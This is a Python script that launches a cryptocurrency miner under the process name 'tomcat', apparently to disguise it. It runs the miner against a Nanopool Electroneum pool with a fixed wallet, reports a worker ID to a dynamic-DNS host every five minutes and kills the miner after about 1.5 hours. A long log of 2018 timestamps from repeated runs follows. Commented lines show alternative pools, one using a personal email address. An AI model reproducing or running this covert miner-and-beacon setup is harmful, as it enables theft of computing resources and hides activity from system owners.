import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:06.703779
#2018-02-17 17:35:06.785228
#2018-02-17 19:23:01.592774
#2018-02-17 21:12:07.412434
#2018-02-17 22:56:02.035088
#2018-02-18 00:43:02.025214
#2018-02-18 02:32:06.128979
#2018-02-18 04:19:04.407050
#2018-02-18 06:10:02.003745
#2018-02-18 08:01:04.338461
#2018-02-18 09:49:04.903736
#2018-02-18 11:36:06.396863
#2018-02-18 13:24:01.573797
#2018-02-18 15:13:05.850689
#2018-02-18 17:01:06.970759
#2018-02-18 18:48:04.866783
#2018-02-18 20:36:05.447774
#2018-02-18 22:22:06.488499
#2018-02-19 00:11:05.862119
#2018-02-19 01:57:06.583090
#2018-02-19 03:44:05.397130
#2018-02-19 05:31:03.449127
#2018-02-19 07:19:05.290464
#2018-02-19 09:08:05.555988
#2018-02-19 10:56:03.589967
#2018-02-19 12:45:10.159886
#2018-02-19 14:34:04.627432
#2018-02-19 16:21:11.650735
#2018-02-19 18:09:06.938486
#2018-02-19 19:55:06.991419
#2018-02-19 21:44:06.078937
#2018-02-19 23:32:08.331108
#2018-02-20 01:18:01.931477
#2018-02-20 03:08:05.171487
#2018-02-20 04:55:06.171477
#2018-02-20 06:37:07.228560
#2018-02-20 08:22:05.256389
#2018-02-20 10:08:01.289848
#2018-02-20 11:52:11.073148
#2018-02-20 13:41:09.258339
#2018-02-20 15:24:08.108192
#2018-02-20 17:11:02.115714
#2018-02-20 18:59:04.027560
#2018-02-20 20:48:06.348454
#2018-02-20 22:34:04.241636
#2018-02-21 00:15:08.443822
#2018-02-21 02:02:07.962613
#2018-02-21 03:50:08.747889
#2018-02-21 05:39:06.735371
#2018-02-21 07:27:01.794097
#2018-02-21 09:12:02.185095
#2018-02-21 11:00:10.309237
#2018-02-21 12:47:01.733128
#2018-02-21 14:35:06.446454
#2018-02-21 16:21:12.096947
#2018-02-21 18:12:05.535781
#2018-02-21 19:58:06.052998
#2018-02-21 21:45:04.072702
#2018-02-21 23:34:07.688780
#2018-02-22 01:24:07.596123
#2018-02-22 03:12:07.600116
#2018-02-22 04:58:01.411937
#2018-02-22 06:42:06.439621
#2018-02-22 08:31:05.734432
#2018-02-22 10:19:01.352719
#2018-02-22 12:03:06.113846
#2018-02-22 13:48:04.054602
#2018-02-22 15:36:08.421261
#2018-02-22 17:23:09.260923
#2018-02-22 19:12:07.367854
#2018-02-22 21:03:08.320091
#2018-02-22 22:49:06.543353
#2018-02-23 00:38:03.121948
#2018-02-23 02:24:01.826997
#2018-02-23 04:13:03.726651
#2018-02-23 05:58:06.327978
#2018-02-23 07:32:05.949178
#2018-02-23 09:35:07.481212
#2018-02-23 11:17:08.285352
#2018-02-23 12:35:08.968602
#2018-02-23 14:02:08.438851
#2018-02-23 15:37:07.687287
#2018-02-23 17:11:04.412060
#2018-02-23 18:58:06.465574
#2018-02-23 20:33:07.361711
#2018-02-23 22:07:07.928132
#2018-02-23 23:42:06.354176
#2018-02-24 01:18:06.385277
#2018-02-24 02:53:07.652268
#2018-02-24 04:28:06.471048
#2018-02-24 05:54:07.830392
#2018-02-24 07:31:04.338242
#2018-02-24 09:03:07.226020
#2018-02-24 10:53:04.044166
#2018-02-24 12:41:02.204788
#2018-02-24 14:29:03.574764
#2018-02-24 16:17:05.108822
#2018-02-24 18:11:06.667850
#2018-02-24 19:57:06.533342
#2018-02-24 21:41:03.700268
#2018-02-25 00:33:06.305889
#2018-02-25 04:22:02.150588
#2018-02-25 07:53:04.942558